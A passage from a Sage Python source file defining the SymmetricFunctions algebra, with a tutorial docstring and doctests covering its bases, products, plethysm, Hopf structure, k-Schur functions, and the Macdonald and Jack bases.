Symmetric functions, with their multiple realizations
"""
#*****************************************************************************
# Copyright (C) 2007 Mike Hansen <mhansen@gmail.com>
# 2009-2012 Jason Bandlow <jbandlow@gmail.com>
# 2012 Anne Schilling <anne at math.ucdavis.edu>
# 2009-2012 Nicolas M. Thiery <nthiery at users.sf.net>
# 2012 Mike Zabrocki <mike.zabrocki@gmail.com>
#
# Distributed under the terms of the GNU General Public License (GPL)
#
# This code is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# The full text of the GPL is available at:
#
# http://www.gnu.org/licenses/
#*****************************************************************************
from sage.structure.parent import Parent
from sage.structure.unique_representation import UniqueRepresentation
from sage.categories.all import Rings, GradedHopfAlgebras
from sage.combinat.partition import Partitions
from sage.combinat.free_module import CombinatorialFreeModule
from sage.rings.rational_field import QQ
import schur
import monomial
import powersum
import elementary
import homogeneous
import hall_littlewood
import jack
import macdonald
import llt
class SymmetricFunctions(UniqueRepresentation, Parent):
r"""
The abstract algebra of commutative symmetric functions
.. rubric:: Symmetric Functions in Sage
.. MODULEAUTHOR:: Jason Bandlow, Anne Schilling, Nicolas M. Thiery, Mike Zabrocki
This document is an introduction to working with symmetric function
theory in Sage.
It is not intended to be an introduction to the theory
of symmetric functions ([MAC]_ and [STA]_, Chapter 7, are two excellent
references.) The reader is also expected to be familiar with Sage.
.. rubric:: The algebra of symmetric functions
The algebra of symmetric functions is the unique free commutative graded
connected algebra over the given ring, with one generator in each degree. It
can also be thought of as the inverse limit (in the category of graded
algebras) of the algebra of symmetric polynomials in `n` variables as `n \rightarrow \infty`.
Sage allows us to construct the algebra of symmetric functions over
any ring. We will use a base ring of rational numbers in these first
examples::
sage: Sym = SymmetricFunctions(QQ)
sage: Sym
Symmetric Functions over Rational Field
Sage knows certain categorical information about this algebra::
sage: Sym.category()
Join of Category of hopf algebras over Rational Field
and Category of graded algebras over Rational Field
and Category of monoids with realizations
and Category of coalgebras over Rational Field with realizations
Notice that ``Sym`` is an *abstract* algebra. This reflects the fact that
there are multiple natural bases. To work with specific
elements, we need a *realization* of this algebra. In practice, this
means we need to specify a basis.
.. rubric:: An example basis - power sums
Here is an example of how one might use the power sum realization::
sage: p = Sym.powersum()
sage: p
Symmetric Functions over Rational Field in the powersum basis
``p`` now represents the realization of the symmetric function algebra on
the power sum basis. The basis itself is accessible through::
sage: p.basis()
Lazy family (Term map from Partitions to Symmetric Functions over Rational Field in the powersum basis(i))_{i in Partitions}
sage: p.basis().keys()
Partitions
This last line means that ``p.basis()`` is an association between the set
of Partitions and the basis elements of the algebra ``p``. To construct a
specific element one can therefore do::
sage: p.basis()[Partition([2,1,1])]
p[2, 1, 1]
As this is rather cumbersome, realizations of the symmetric function
algebra allow for the following abuses of notation::
sage: p[Partition([2, 1, 1])]
p[2, 1, 1]
sage: p[[2, 1, 1]]
p[2, 1, 1]
sage: p[2, 1, 1]
p[2, 1, 1]
or even::
sage: p[(i for i in [2, 1, 1])]
p[2, 1, 1]
In the special case of the empty partition, due to a limitation in
Python syntax, one cannot use::
sage: p[] # todo: not implemented
Please use instead::
sage: p[[]]
p[]
    .. note:: When elements are constructed using the ``p[something]`` syntax,
an error will be raised if the input cannot be interpreted as a partition.
This is *not* the case when ``p.basis()`` is used::
sage: p['something']
Traceback (most recent call last):
...
ValueError: ['s', 'o', 'm', 'e', 't', 'h', 'i', 'n', 'g'] is not an element of Partitions
sage: p.basis()['something']
p'something'
Elements of ``p`` are linear combinations of such compositions::
sage: p.an_element()
2*p[] + 2*p[1] + 3*p[2]
.. rubric:: Algebra structure
Algebraic combinations of basis elements can be entered in a natural way::
sage: p[2,1,1] + 2 * p[1] * (p[4] + p[2,1])
3*p[2, 1, 1] + 2*p[4, 1]
Let us explore the other operations of ``p``. We can ask for
the mathematical properties of ``p``::
sage: p.categories()
[Category of bases of Symmetric Functions over Rational Field, Category of graded hopf algebras with basis over Rational Field, ...]
To start with, ``p`` is a graded algebra, the grading being induced
by the size of the partitions. Due to this, the one is the basis
element indexed by the empty partition::
sage: p.one()
p[]
The ``p`` basis is multiplicative; that is, multiplication is induced by
linearity from the (nonincreasingly sorted) concatenation of partitions::
sage: p[3,1] * p[2,1]
p[3, 2, 1, 1]
sage: (p.one() + 2 * p[3,1]) * p[4, 2]
p[4, 2] + 2*p[4, 3, 2, 1]
.. rubric:: The classical bases
In addition to the power sum basis, the other classical bases of the
symmetric function algebra are the elementary, complete homogeneous,
monomial, and Schur bases. These can be defined as follows::
sage: e = Sym.elementary()
sage: h = Sym.homogeneous()
sage: m = Sym.monomial()
sage: s = Sym.schur()
These can be defined all at once with the single command
::
sage: Sym.inject_shorthands()
doctest:...: RuntimeWarning: redefining global value `h`
doctest:...: RuntimeWarning: redefining global value `s`
doctest:...: RuntimeWarning: redefining global value `e`
doctest:...: RuntimeWarning: redefining global value `m`
doctest:...: RuntimeWarning: redefining global value `p`
We can then do conversions from one basis to another::
sage: s(p[2,1])
-s[1, 1, 1] + s[3]
sage: m(p[3])
m[3]
sage: m(p[3,2])
m[3, 2] + m[5]
For computations which mix bases, Sage will return a result with respect
to a single (not necessarily predictable) basis::
sage: p[2] * s[2] - m[4]
1/2*p[2, 1, 1] + 1/2*p[2, 2] - p[4]
sage: p( m[1] * ( e[3]*s[2] + 1 ))
p[1] + 1/12*p[1, 1, 1, 1, 1, 1] - 1/6*p[2, 1, 1, 1, 1] - 1/4*p[2, 2, 1, 1] + 1/6*p[3, 1, 1, 1] + 1/6*p[3, 2, 1]
The one for different bases such as the power sum and Schur function is the same::
sage: s.one() == p.one()
True
.. rubric:: Basic computations
In this section, we explore some of the many methods that can be applied
to an arbitrary symmetric function::
sage: f = s[2]^2; f
s[2, 2] + s[3, 1] + s[4]
For more methods than discussed here, create a symmetric function as
above, and use ``f.<tab>``.
.. _`Representation theory of the symmetric group`:
.. rubric:: Representation theory of the symmetric group
The Schur functions `s_\lambda` can also be interpreted as irreducible characters of the symmetric
group `S_n`, where `n` is the size of the partition `\lambda`. Since the Schur functions of
degree `n` form a basis of the symmetric functions of degree `n`, it
follows that an arbitrary symmetric function (homogeneous of degree
`n`) may be interpreted as a function on the symmetric group. In this
interpretation the power sum symmetric function `p_\lambda` is the characteristic
function of the conjugacy class with shape `\lambda`, multiplied by the order of
the centralizer of an element. Hence the irreducible characters can be computed
as follows::
sage: Sym = SymmetricFunctions(QQ)
sage: s = Sym.schur()
sage: p = Sym.power()
sage: P = Partitions(5).list()
sage: P = [P[i] for i in range(len(P)-1,-1,-1)]
sage: M = matrix([[s[P[i]].scalar(p[P[j]]) for j in range(len(P))] for i in range(len(P))])
sage: M
[ 1 -1 1 1 -1 -1 1]
[ 4 -2 0 1 1 0 -1]
[ 5 -1 1 -1 -1 1 0]
[ 6 0 -2 0 0 0 1]
[ 5 1 1 -1 1 -1 0]
[ 4 2 0 1 -1 0 -1]
[ 1 1 1 1 1 1 1]
We can indeed check that this agrees with the character table of `S_5`::
sage: SymmetricGroup(5).character_table() == M
True
In this interpretation of symmetric functions as characters on the
symmetric group, the multiplication and comultiplication are
interpreted as induction (from `S_n\times S_m` to `S_{n+m}`)
and restriction, respectively. The Schur functions can also be interpreted
as characters of `GL_n`, see `Partitions and Schur functions`__.
__ ../../../../thematic_tutorials/lie/lie_basics.html#partitions-and-schur-polynomials
.. rubric:: The omega involution
The `\omega` involution is the linear extension of the map which sends
`e_\lambda` to `h_{\lambda}`::
sage: h(f)
h[2, 2]
sage: e(f.omega())
e[2, 2]
.. rubric:: The Hall scalar product
The Hall scalar product on the algebra of symmetric functions makes the
Schur functions into an orthonormal basis::
sage: f.scalar(f)
3
.. rubric:: Skewing
*Skewing* is the adjoint operation to multiplication with respect to
this scalar product::
sage: f.skew_by(s[1])
2*s[2, 1] + 2*s[3]
In general, ``s[la].skew_by(s[mu])`` is the symmetric function typically
denoted `s_{\lambda \setminus \mu}` or `s_{\lambda / \mu}`.
.. rubric:: Expanding into variables
We can expand a symmetric function into a symmetric polynomial in a
specified number of variables::
sage: f.expand(2)
x0^4 + 2*x0^3*x1 + 3*x0^2*x1^2 + 2*x0*x1^3 + x1^4
See the documentation for ``expand`` for more examples.
.. rubric:: The Kronecker product
As in the section on the `Representation theory of
the symmetric group`_, a symmetric function may be considered as a
class function on the symmetric group where the elements
`p_\mu/z_\mu` are the indicators of a permutation having
cycle structure `\mu`. The Kronecker product of two
symmetric functions corresponds to the pointwise product
of these class functions.
Since the Schur functions are the irreducible characters
of the symmetric group under this identification, the Kronecker
product of two Schur functions corresponds to the internal
tensor product of two irreducible symmetric group representations.
Under this identification, the Kronecker
product of `p_\mu/z_\mu` and `p_\nu/z_\nu` is `p_\mu/z_\mu`
if `\mu=\nu`, and the result is equal to `0` otherwise.
``internal_product``, ``kronecker_product``, ``inner_tensor`` and
``itensor`` are different names for the same function.
::
sage: f.kronecker_product(f)
s[1, 1, 1, 1] + 3*s[2, 1, 1] + 4*s[2, 2] + 5*s[3, 1] + 3*s[4]
.. rubric:: Plethysm
The *plethysm* of symmetric functions is the operation corresponding to
composition of representations of the general linear group. See [STA]_
Chapter 7, Appendix 2 for details.
::
sage: s[2].plethysm(s[2])
s[2, 2] + s[4]
Plethysm can also be written as a composition of functions::
sage: s[2]( s[2] )
s[2, 2] + s[4]
If the coefficient ring contains degree 1 elements, these are handled
properly by plethysm::
sage: R.<t> = QQ[]; s = SymmetricFunctions(R).schur()
sage: s[2]( (1-t)*s[1] )
(t^2-t)*s[1, 1] + (-t+1)*s[2]
See the documentation for ``plethysm`` for more information.
.. rubric:: Inner plethysm
The operation of inner plethysm ``f.inner_plethysm(g)`` models the
composition of the `S_n` representation represented by `g` with the
`GL_m` representation whose character is `f`. See the documentation of
``inner_plethysm``, [ST94]_ or [STA]_, exercise 7.74 solutions for more
information::
sage: s = SymmetricFunctions(QQ).schur()
sage: f = s[2]^2
sage: f.inner_plethysm(s[2])
s[2]
.. rubric:: Hopf algebra structure
The ring of symmetric functions is further endowed with a coalgebra
structure. The coproduct is an algebra morphism, and therefore
determined by its values on the generators; the power sum generators
are primitive::
sage: p[1].coproduct()
p[] # p[1] + p[1] # p[]
sage: p[2].coproduct()
p[] # p[2] + p[2] # p[]
The coproduct, being cocommutative on the generators, is cocommutative everywhere::
sage: p[2, 1].coproduct()
p[] # p[2, 1] + p[1] # p[2] + p[2] # p[1] + p[2, 1] # p[]
This coproduct, along with the counit which sends every symmetric function
to its `0`-th homogeneous component, makes the ring of symmetric functions
into a graded connected bialgebra. It is known that every graded connected
bialgebra has an antipode. For the ring of symmetric functions, the antipode
can be characterized explicitly: The antipode is an anti-algebra morphism
(thus an algebra morphism, since our algebra is commutative) which sends
`p_{\lambda}` to `(-1)^{\mathrm{length}(\lambda)} p_{\lambda}` for every
partition `\lambda`. Thus, in particular, it sends the generators on the
``p`` basis to their opposites::
sage: p[3].antipode()
-p[3]
sage: p[3,2,1].antipode()
-p[3, 2, 1]
The graded connected bialgebra of symmetric functions over a `\QQ`-algebra
has a rather simply-understood structure: It is (isomorphic to) the
symmetric algebra of its space of primitives (which is spanned by the
power-sum symmetric functions).
Here are further examples::
sage: f = s[2]^2
sage: f.antipode()
s[1, 1, 1, 1] + s[2, 1, 1] + s[2, 2]
sage: f.coproduct()
s[] # s[2, 2] + s[] # s[3, 1] + s[] # s[4] + 2*s[1] # s[2, 1] + 2*s[1] # s[3] + s[1, 1] # s[1, 1]
+ s[1, 1] # s[2] + s[2] # s[1, 1] + 3*s[2] # s[2] + 2*s[2, 1] # s[1] + s[2, 2] # s[] + 2*s[3] # s[1]
+ s[3, 1] # s[] + s[4] # s[]
sage: f.coproduct().apply_multilinear_morphism( lambda x,y: x*y.antipode() )
0
.. rubric:: Transformations of symmetric functions
There are many methods in Sage which make it easy to manipulate symmetric
functions. For example, if we have some function which acts on partitions
(say, conjugation), it is a simple matter to apply it to the support of a
symmetric function. Here is an example::
sage: conj = lambda mu: mu.conjugate()
sage: f = h[4] + 2*h[3,1]
sage: f.map_support(conj)
h[1, 1, 1, 1] + 2*h[2, 1, 1]
We can also easily modify the coefficients::
sage: def foo(mu, coeff): return mu.conjugate(), -coeff
sage: f.map_item(foo)
-h[1, 1, 1, 1] - 2*h[2, 1, 1]
See also ``map_coefficients``.
There are also methods for building functions directly::
sage: s.sum_of_monomials(mu for mu in Partitions(3))
s[1, 1, 1] + s[2, 1] + s[3]
sage: s.sum_of_monomials(Partitions(3))
s[1, 1, 1] + s[2, 1] + s[3]
sage: s.sum_of_terms( (mu, mu[0]) for mu in Partitions(3))
s[1, 1, 1] + 2*s[2, 1] + 3*s[3]
These are the preferred way to build elements within a program;
the result will usually be faster than using :func:`sum`. It also
guarantees that empty sums yields the zero of ``s`` (see also
``s.sum``).
Note also that it is a good idea to use::
sage: s.one()
s[]
sage: s.zero()
0
instead of ``s(1)`` and ``s(0)`` within programs where speed is important,
in order to prevent unnecessary coercions.
.. rubric:: Different base rings
Depending on the base ring, the different realizations of the symmetric
function algebra may not span the same space::
sage: SZ = SymmetricFunctions(ZZ)
sage: p = SZ.power(); s = SZ.schur()
sage: p(s[1,1,1])
Traceback (most recent call last):
...
TypeError: no conversion of this rational to integer
Because of this, some functions may not behave as expected when working over
the integers, even though they make mathematical sense::
sage: s[1,1,1].plethysm(s[1,1,1])
Traceback (most recent call last):
...
TypeError: no conversion of this rational to integer
It is possible to work over different base rings simultaneously::
sage: s = SymmetricFunctions(QQ).schur()
sage: p = SymmetricFunctions(QQ).power()
sage: sz = SymmetricFunctions(ZZ).schur(); sz._prefix = 'sz'
sage: pz = SymmetricFunctions(ZZ).power(); pz._prefix = 'pz'
sage: p(sz[1,1,1])
1/6*p[1, 1, 1] - 1/2*p[2, 1] + 1/3*p[3]
sage: sz( 1/6*p[1, 1, 1] - 1/2*p[2, 1] + 1/3*p[3] )
sz[1, 1, 1]
As shown in this example, if you are working over multiple base rings
simultaneously, it is a good idea to change the prefix in some cases, so that
you can tell from the output which realization your result is in.
Let us change the notation back for the remainder of this tutorial::
sage: sz._prefix = 's'
sage: pz._prefix = 'p'
One can also use the Sage standard renaming idiom to get shorter outputs::
sage: Sym = SymmetricFunctions(QQ)
sage: Sym.rename("Sym")
sage: Sym
Sym
sage: Sym.rename()
And we name it back::
sage: Sym.rename("Symmetric Functions over Rational Field"); Sym
Symmetric Functions over Rational Field
.. rubric:: Other bases
There are two additional basis of the symmetric functions which are not
considered as classical bases:
* forgotten basis
* Witt basis
The forgotten basis is the dual basis of the elementary symmetric
functions basis with respect to the Hall scalar product. The Witt basis
can be constructed by
.. MATH::
\prod_{d=1}^{\infty} (1 - w_d t^d)^{-1} = \sum_{n=0}^{\infty} h_n t^n
where `t` is a formal variable.
There are further bases of the ring of symmetric functions, in general over
fields with parameters such as `q` and `t`:
* Hall-Littlewood bases
* Jack bases
* Macdonald bases
* `k`-Schur functions
We briefly demonstrate how to access these bases. For more information, see
the documentation of the individual bases.
The *Jack polynomials* can be obtained as::
sage: Sym = SymmetricFunctions(FractionField(QQ['t']))
sage: Jack = Sym.jack()
sage: P = Jack.P(); J = Jack.J(); Q = Jack.Q()
sage: J(P[2,1])
(1/(t+2))*JackJ[2, 1]
The parameter `t` can be specialized as follows::
sage: Sym = SymmetricFunctions(QQ)
sage: Jack = Sym.jack(t = 1)
sage: P = Jack.P(); J = Jack.J(); Q = Jack.Q()
sage: J(P[2,1])
1/3*JackJ[2, 1]
Similarly one can access the Hall-Littlewood and Macdonald polynomials, etc::
sage: Sym = SymmetricFunctions(FractionField(QQ['q','t']))
sage: Mcd = Sym.macdonald()
sage: P = Mcd.P(); J = Mcd.J(); Q = Mcd.Q()
sage: J(P[2,1])
(1/(-q*t^4+2*q*t^3-q*t^2+t^2-2*t+1))*McdJ[2, 1]
.. rubric:: `k`-Schur functions
The `k`-Schur functions live in the `k`-bounded subspace of the ring of
symmetric functions. It is possible to compute in the `k`-bounded subspace
directly::
sage: Sym = SymmetricFunctions(QQ)
sage: ks = Sym.kschur(3,1)
sage: f = ks[2,1]*ks[2,1]; f
ks3[2, 2, 1, 1] + ks3[2, 2, 2] + ks3[3, 1, 1, 1]
or to lift to the ring of symmetric functions::
sage: f.lift()
s[2, 2, 1, 1] + s[2, 2, 2] + s[3, 1, 1, 1] + 2*s[3, 2, 1] + s[3, 3] + s[4, 1, 1] + s[4, 2]
However, it is not always possible to convert a symmetric function to the `k`-bounded subspace::
sage: s = Sym.schur()
sage: ks(s[2,1,1])
Traceback (most recent call last):
...
ValueError: s[2, 1, 1] is not in the image
The `k`-Schur functions are more generally defined with a parameter `t` and they are
a basis of the subspace spanned by the Hall-Littlewood ``Qp`` symmetric functions
indexed by partitions whose first part is less than or equal to `k`::
sage: Sym = SymmetricFunctions(QQ['t'].fraction_field())
sage: SymS3 = Sym.kBoundedSubspace(3) # default t='t'
sage: ks = SymS3.kschur()
sage: Qp = Sym.hall_littlewood().Qp()
sage: ks(Qp[2,1,1,1])
ks3[2, 1, 1, 1] + (t^2+t)*ks3[2, 2, 1] + (t^3+t^2)*ks3[3, 1, 1] + t^4*ks3[3, 2]
The subspace spanned by the `k`-Schur functions with a parameter `t` are not known
to form a natural algebra. However it is known that the product of a `k`-Schur
function and an `\ell`-Schur function is in the linear span of the `k+\ell`-Schur
functions::
sage: ks(ks[2,1]*ks[1,1])
Traceback (most recent call last):
...
ValueError: s[2, 1, 1, 1] + s[2, 2, 1] + s[3, 1, 1] + s[3, 2] is not in the image
sage: ks[2,1]*ks[1,1]
s[2, 1, 1, 1] + s[2, 2, 1] + s[3, 1, 1] + s[3, 2]
sage: ks6 = Sym.kBoundedSubspace(6).kschur()
sage: ks6(ks[3,1,1]*ks[3])
ks6[3, 3, 1, 1] + ks6[4, 2, 1, 1] + (t+1)*ks6[4, 3, 1] + t*ks6[4, 4]
+ ks6[5, 1, 1, 1] + ks6[5, 2, 1] + t*ks6[5, 3] + ks6[6, 1, 1]
.. rubric:: dual `k`-Schur functions
The dual space to the subspace spanned by the `k`-Schur functions is most naturally
realized as a quotient of the ring of symmetric functions by an ideal. When `t=1`
the ideal is generated by the monomial symmetric functions indexed by partitions
whose first part is greater than `k`.::
sage: Sym = SymmetricFunctions(QQ)
sage: SymQ3 = Sym.kBoundedQuotient(3,t=1)
sage: km = SymQ3.kmonomial()
sage: km[2,1]*km[2,1]
4*m3[2, 2, 1, 1] + 6*m3[2, 2, 2] + 2*m3[3, 2, 1] + 2*m3[3, 3]
sage: F = SymQ3.affineSchur()
sage: F[2,1]*F[2,1]
2*F3[1, 1, 1, 1, 1, 1] + 4*F3[2, 1, 1, 1, 1] + 4*F3[2, 2, 1, 1] + 4*F3[2, 2, 2]
+ 2*F3[3, 1, 1, 1] + 4*F3[3, 2, 1] + 2*F3[3, 3]
When `t` is not equal to `1`, the subspace spanned by the `k`-Schur functions is
realized as a quotient of the ring of symmetric functions by the ideal generated by
the Hall-Littlewood symmetric functions in the P basis indexed by partitions with
first part greater than `k`.::
sage: Sym = SymmetricFunctions(FractionField(QQ['t']))
sage: SymQ3 = Sym.kBoundedQuotient(3)
sage: kHLP = SymQ3.kHallLittlewoodP()
sage: kHLP[2,1]*kHLP[2,1]
(t^2+2*t+1)*HLP3[2, 2, 1, 1] + (t^3+2*t^2+2*t+1)*HLP3[2, 2, 2]
+ (-t^4-t^3+t+1)*HLP3[3, 1, 1, 1] + (-t^2+t+2)*HLP3[3, 2, 1] + (t+1)*HLP3[3, 3]
sage: HLP = Sym.hall_littlewood().P()
sage: kHLP(HLP[3,1])
HLP3[3, 1]
sage: kHLP(HLP[4])
0
In this space, the basis which is dual to the `k`-Schur functions conjecturally
expands positively in the `k`-bounded Hall-Littlewood functions and has positive
structure coefficients.::
sage: dks = SymQ3.dual_k_Schur()
sage: kHLP(dks[2,2])
(t^4+t^2)*HLP3[1, 1, 1, 1] + t*HLP3[2, 1, 1] + HLP3[2, 2]
sage: dks[2,1]*dks[1,1]
(t^2+t)*dks3[1, 1, 1, 1, 1] + (t+1)*dks3[2, 1, 1, 1] + (t+1)*dks3[2, 2, 1]
+ dks3[3, 1, 1] + dks3[3, 2]
At `t=1` the `k`-bounded Hall-Littlewood basis is equal to the `k`-bounded monomial
basis and the dual `k`-Schur elements are equal to the affine Schur basis. The
`k`-bounded monomial basis and affine Schur functions are faster and should be used
instead of the `k`-bounded Hall-Littlewood P basis and dual `k`-Schur functions when
`t=1`.::
sage: SymQ3 = Sym.kBoundedQuotient(3,t=1)
sage: dks = SymQ3.dual_k_Schur()
sage: F = SymQ3.affineSchur()
sage: F[3,1]==dks[3,1]
True
.. rubric:: Implementing new bases
.. todo:: to be described
.. rubric:: Acknowledgements
The design is heavily inspired from the implementation of
symmetric functions in MuPAD-Combinat (see [HT04]_ and [FD06]_).
REFERENCES:
.. [FD06] Francois Descouens, Making research on symmetric functions using MuPAD-Combinat.
In Andres Iglesias and Nobuki Takayama, editors, 2nd International Congress on Mathematical Software (ICMS'06),
volume 4151 of LNCS, pages 407-418, Castro Urdiales, Spain, September 2006. Springer-Verlag.
:arXiv:`0806.1873`
.. [HT04] Florent Hivert and Nicolas M. Thiery,
MuPAD-Combinat, an open-source package for research in algebraic combinatorics.
Sem. Lothar. Combin., 51 :Art. B51z, 70 pp. (electronic), 2004.
http://mupad-combinat.sf.net/.
.. [MAC] Ian Macdonald, Symmetric Functions and Orthogonal Polynomials,
Second edition. With contributions by A. Zelevinsky. Oxford Mathematical Monographs.
Oxford Science Publications. The Clarendon Press, Oxford University Press, New York, 1995. x+475 pp.
ISBN: 0-19-853489-2
.. [STA] Richard Stanley, Enumerative combinatorics. Vol. 2.
With a foreword by Gian-Carlo Rota and appendix 1 by Sergey Fomin.
Cambridge Studies in Advanced Mathematics, 62. Cambridge University Press, Cambridge, 1999. xii+581 pp.
ISBN: 0-521-56069-1; 0-521-78987-7
.. [ST94] Scharf, Thomas, Thibon, Jean-Yves,
A Hopf-algebra approach to inner plethysm.
Adv. Math. 104 (1994), no. 1, 30-58.
:doi:`10.1006/aima.1994.1019`
.. rubric:: Further tests
TESTS::
sage: Sym = SymmetricFunctions(QQ)
sage: Sym
Symmetric Functions over Rational Field
sage: h = Sym.h(); e = Sym.e(); s = Sym.s(); m = Sym.m(); p = Sym.p()
sage: ( ( h[2,1] * ( 1 + 3 * h[2,1]) ) + s[2]. antipode()) . coproduct()
h[] # h[1, 1] - h[] # h[2] + h[] # h[2, 1] + 3*h[] # h[2, 2, 1, 1] + h[1] # h[1] + h[1] # h[1, 1]
+ h[1] # h[2] + 6*h[1] # h[2, 1, 1, 1] + 6*h[1] # h[2, 2, 1] + h[1, 1] # h[] + h[1, 1] # h[1]
+ 3*h[1, 1] # h[1, 1, 1, 1] + 12*h[1, 1] # h[2, 1, 1] + 3*h[1, 1] # h[2, 2] + 6*h[1, 1, 1] # h[1, 1, 1]
+ 6*h[1, 1, 1] # h[2, 1] + 3*h[1, 1, 1, 1] # h[1, 1] - h[2] # h[] + h[2] # h[1] + 6*h[2] # h[2, 1, 1]
+ h[2, 1] # h[] + 6*h[2, 1] # h[1, 1, 1] + 12*h[2, 1] # h[2, 1] + 12*h[2, 1, 1] # h[1, 1]
+ 6*h[2, 1, 1] # h[2] + 6*h[2, 1, 1, 1] # h[1] + 3*h[2, 2] # h[1, 1] + 6*h[2, 2, 1] # h[1] + 3*h[2, 2, 1, 1] # h[]
.. TODO::
- Introduce fields with degree 1 elements as in
MuPAD-Combinat, to get proper plethysm.
- Use UniqueRepresentation to get rid of all the manual cache
handling for the bases
- Devise a mechanism so that pickling bases of symmetric
functions pickles the coercions which have a cache.
"""
def __init__(self, R):
r"""
Initialization of ``self``.
INPUT:
- ``R`` -- a ring
EXAMPLES::
sage: Sym = SymmetricFunctions(QQ)
TESTS::
sage: TestSuite(Sym).run()
"""
assert(R in Rings())
        self._base = R  # Won't be needed once CategoryObject no longer overrides base_ring
Parent.__init__(self, category = GradedHopfAlgebras(R).WithRealizations())
def a_realization(self):
r"""
Returns a particular realization of ``self`` (the Schur basis).
EXAMPLES::
sage: Sym = SymmetricFunctions(QQ)
sage: Sym.a_realization()
Symmetric Functions over Rational Field in the Schur basis
"""
return self.schur()
def _repr_(self): # could be taken care of by the category
r"""
Representation of ``self``
TESTS::
sage: SymmetricFunctions(RR) # indirect doctest
Symmetric Functions over Real Field with 53 bits of precision
"""
return "Symmetric Functions over %s"%self.base_ring()
def schur(self):
r"""
The Schur basis of the Symmetric Functions
EXAMPLES::
sage: SymmetricFunctions(QQ).schur()
Symmetric Functions over Rational Field in the Schur basis
"""
return schur.SymmetricFunctionAlgebra_schur(self)
s = schur
Schur = schur # Currently needed by SymmetricFunctions.__init_extra__
# and sfa.SymmetricFunctionsBases.corresponding_basis_over
def powersum(self):
r"""
The power sum basis of the Symmetric Functions
EXAMPLES::
sage: SymmetricFunctions(QQ).powersum()
Symmetric Functions over Rational Field in the powersum basis
"""
return powersum.SymmetricFunctionAlgebra_power(self)
p = powersum
power = powersum # Todo: get rid of this one when it won't be needed anymore
def complete(self):
r"""
The complete basis of the Symmetric Functions
EXAMPLES::
sage: SymmetricFunctions(QQ).complete()
Symmetric Functions over Rational Field in the homogeneous basis
"""
return homogeneous.SymmetricFunctionAlgebra_homogeneous(self)
h = complete
homogeneous = complete
def elementary(self):
r"""
The elementary basis of the Symmetric Functions
EXAMPLES::
sage: SymmetricFunctions(QQ).elementary()
Symmetric Functions over Rational Field in the elementary basis
"""
return elementary.SymmetricFunctionAlgebra_elementary(self)
e = elementary
def monomial(self):
r"""
The monomial basis of the Symmetric Functions
EXAMPLES::
sage: SymmetricFunctions(QQ).monomial()
Symmetric Functions over Rational Field in the monomial basis
"""
return monomial.SymmetricFunctionAlgebra_monomial(self)
m = monomial
def witt(self, coerce_h=True, coerce_e=False, coerce_p=False):
r"""
The Witt basis of the symmetric functions.
EXAMPLES::
sage: SymmetricFunctions(QQ).witt()
Symmetric Functions over Rational Field in the Witt basis
sage: SymmetricFunctions(QQ).witt(coerce_p=True)
Symmetric Functions over Rational Field in the Witt basis
sage: SymmetricFunctions(QQ).witt(coerce_h=False, coerce_e=True, coerce_p=True)
Symmetric Functions over Rational Field in the Witt basis
"""
import witt
return witt.SymmetricFunctionAlgebra_witt(self, coerce_h=coerce_h, coerce_e=coerce_e, coerce_p=coerce_p)
w = witt
# Currently needed by sfa.SymmetricFunctionsBases.corresponding_basis_over
Witt = witt
def forgotten(self):
r"""
The forgotten basis of the Symmetric Functions (or the basis dual to
the elementary basis with respect to the Hall scalar product).
EXAMPLES::
sage: SymmetricFunctions(QQ).forgotten()
Symmetric Functions over Rational Field in the forgotten basis
TESTS:
Over the rationals::
sage: Sym = SymmetricFunctions(QQ)
sage: e = Sym.e()
sage: f = Sym.f()
sage: h = Sym.h()
sage: p = Sym.p()
sage: s = Sym.s()
sage: m = Sym.m()
sage: e(f([2,1]))
-2*e[1, 1, 1] + 5*e[2, 1] - 3*e[3]
sage: f(e([2,1]))
3*f[1, 1, 1] + 2*f[2, 1] + f[3]
sage: h(f([2,1]))
h[2, 1] - 3*h[3]
sage: f(h([2,1]))
3*f[1, 1, 1] + f[2, 1]
sage: p(f([2,1]))
-p[2, 1] - p[3]
sage: f(p([2,1]))
-f[2, 1] - f[3]
sage: s(f([2,1]))
s[2, 1] - 2*s[3]
sage: f(s([2,1]))
2*f[1, 1, 1] + f[2, 1]
sage: m(f([2,1]))
-m[2, 1] - 2*m[3]
sage: f(m([2,1]))
-f[2, 1] - 2*f[3]
Over the integers::
sage: Sym = SymmetricFunctions(ZZ)
sage: e = Sym.e()
sage: f = Sym.f()
sage: h = Sym.h()
sage: p = Sym.p()
sage: s = Sym.s()
sage: m = Sym.m()
sage: e(f([2,1]))
-2*e[1, 1, 1] + 5*e[2, 1] - 3*e[3]
sage: f(e([2,1]))
3*f[1, 1, 1] + 2*f[2, 1] + f[3]
sage: h(f([2,1]))
h[2, 1] - 3*h[3]
sage: f(h([2,1]))
3*f[1, 1, 1] + f[2, 1]
sage: f(p([2,1]))
-f[2, 1] - f[3]
sage: s(f([2,1]))
s[2, 1] - 2*s[3]
sage: f(s([2,1]))
2*f[1, 1, 1] + f[2, 1]
sage: m(f([2,1]))
-m[2, 1] - 2*m[3]
sage: f(m([2,1]))
-f[2, 1] - 2*f[3]
Conversion from the forgotten basis to the power-sum basis over the
integers is not well-defined in general, even if the result happens
to have integral coefficients::
sage: p(f([2,1]))
Traceback (most recent call last):
...
TypeError: no conversion of this rational to integer
Fun exercise: prove that `p(f_{\lambda})` and `p(m_{\lambda})` have
integral coefficients whenever `\lambda` is a strict partition.
"""
return self.elementary().dual_basis()
f = forgotten
def macdonald(self, q='q', t='t'):
r"""
Returns the entry point for the various Macdonald bases.
INPUT:
- ``q``, ``t`` -- parameters
Macdonald symmetric functions including bases `P`, `Q`, `J`, `H`, `Ht`.
This also contains the `S` basis which is dual to the Schur basis with
respect to the `q,t` scalar product.
The parameters `q` and `t` must be in the base_ring of parent.
EXAMPLES::
sage: Sym = SymmetricFunctions(FractionField(QQ['q','t']))
sage: P = Sym.macdonald().P(); P
Symmetric Functions over Fraction Field of Multivariate Polynomial Ring in q, t over Rational Field in the Macdonald P basis
sage: P[2]
McdP[2]
sage: Q = Sym.macdonald().Q(); Q
Symmetric Functions over Fraction Field of Multivariate Polynomial Ring in q, t over Rational Field in the Macdonald Q basis
sage: S = Sym.macdonald().S()
sage: s = Sym.schur()
sage: matrix([[S(la).scalar_qt(s(mu)) for la in Partitions(3)] for mu in Partitions(3)])
[1 0 0]
[0 1 0]
[0 0 1]
sage: H = Sym.macdonald().H()
sage: s(H[2,2])
